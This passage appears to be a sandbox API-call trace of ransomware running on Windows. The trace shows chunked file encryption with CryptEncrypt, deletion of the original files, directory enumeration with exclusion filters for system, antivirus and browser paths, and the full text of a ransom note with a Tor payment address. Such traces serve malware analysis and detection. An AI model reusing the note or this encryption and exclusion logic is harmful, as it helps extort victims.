lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.361] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.361] GetLastError () returned 0x0 [0148.361] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.361] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.361] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.361] GetLastError () returned 0x0 [0148.361] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.361] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.361] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.361] GetLastError () returned 0x0 [0148.361] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.361] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.361] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.361] GetLastError () returned 0x0 [0148.361] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.361] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.361] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.361] GetLastError () returned 0x0 [0148.361] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.361] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.361] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.361] GetLastError () returned 0x0 [0148.361] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.361] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.362] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.362] GetLastError () returned 0x0 [0148.362] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.362] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.362] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.362] GetLastError () returned 0x0 [0148.362] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.362] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.362] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.362] GetLastError () returned 0x0 [0148.362] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.362] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.362] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.362] GetLastError () returned 0x0 [0148.362] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.362] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.362] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.362] GetLastError () returned 0x0 [0148.362] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.362] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.362] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.362] GetLastError () returned 0x0 [0148.362] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.362] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.362] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.363] GetLastError () returned 0x0 [0148.363] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.363] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.363] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.363] GetLastError () returned 0x0 [0148.363] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.363] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.363] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.363] GetLastError () returned 0x0 [0148.363] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.363] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.363] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.363] GetLastError () returned 0x0 [0148.363] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.363] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.363] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0148.363] GetLastError () returned 0x0 [0148.363] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0148.363] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0148.363] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0148.364] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui")) returned 0x20 [0148.364] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0148.364] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui") returned 1 [0148.364] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui")) returned 0 [0148.364] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui" [0148.364] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE") returned 1 [0148.364] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\.xXB680.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\.xxb680.tmp")) returned 0xb680 [0148.365] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\.xXB680.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\.xxb680.tmp"), dwFlags=0x1) returned 0 [0148.365] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\.xXB680.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\.xxb680.tmp")) returned 1 [0148.365] CryptDestroyKey (hKey=0x9ad438) returned 1 [0148.365] wcslen (_String="OK") returned 0x2 [0148.365] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.365] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.365] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0148.365] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0148.365] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0148.365] FindNextFileW (in: hFindFile=0x9ad338, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0148.365] GetLastError () returned 0x12 [0148.365] FindClose (in: hFindFile=0x9ad338 | out: hFindFile=0x9ad338) returned 1 [0148.366] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0148.366] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0148.366] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0148.367] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0148.367] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.367] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.367] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0148.367] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.367] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*.exe") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*.dll") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*.lnk") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*.bat") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*.ini") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*.msi") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*.scf") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*pagefile.sys*") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*NTUSER.DAT*") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*AppData*") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*\\winrar\\*") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*\\java\\*") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*\\windows\\*") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*\\ESET\\*") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*\\AVG\\*") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*\\AVIRA\\*") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*Atheros*") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*Realtek*") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*bootmgr*") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*boot*") returned 0 [0148.367] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*boot*") returned 0 [0148.368] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*CONFIG.SYS*") returned 0 [0148.368] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*IO.SYS*") returned 0 [0148.368] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*MSDOS.SYS*") returned 0 [0148.368] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*NTDETECT.COM*") returned 0 [0148.368] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*ntldr*") returned 0 [0148.368] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*chrome*") returned 0 [0148.368] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*opera*") returned 0 [0148.368] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", pszSpec="*firefox*") returned 0 [0148.368] wcslen (_String="\\\\?\\") returned 0x4 [0148.368] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad578 [0148.368] wcscmp (_String1=".", _String2=".") returned 0 [0148.368] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0148.368] wcscmp (_String1="..", _String2=".") returned 1 [0148.368] wcscmp (_String1="..", _String2="..") returned 0 [0148.368] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0148.368] PathMatchSpecW 